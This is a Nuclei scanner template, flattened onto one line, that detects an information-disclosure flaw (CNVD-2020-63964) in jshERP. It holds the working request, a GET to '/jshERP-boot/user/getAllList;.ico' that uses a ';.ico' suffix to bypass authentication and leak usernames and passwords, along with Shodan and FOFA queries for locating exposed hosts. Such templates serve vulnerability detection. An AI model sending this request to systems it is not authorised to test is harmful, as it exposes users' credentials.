id: CNVD-2020-63964 info: name: jshERP - Information Disclosure author: brucelsone severity: high description: | jshERP that can reveal sensitive information including system credentials without credentials. reference: - https://cn-sec.com/archives/1798444.html metadata: max-request: 1 shodan-query: http.favicon.hash:-1298131932 fofa-query: jshERP-boot tags: cnvd,cnvd2022,jsherp,disclosure http: - method: GET path: - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico" matchers-condition: and matchers: - type: word words: - '"username":' - '"loginName":' - '"password":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200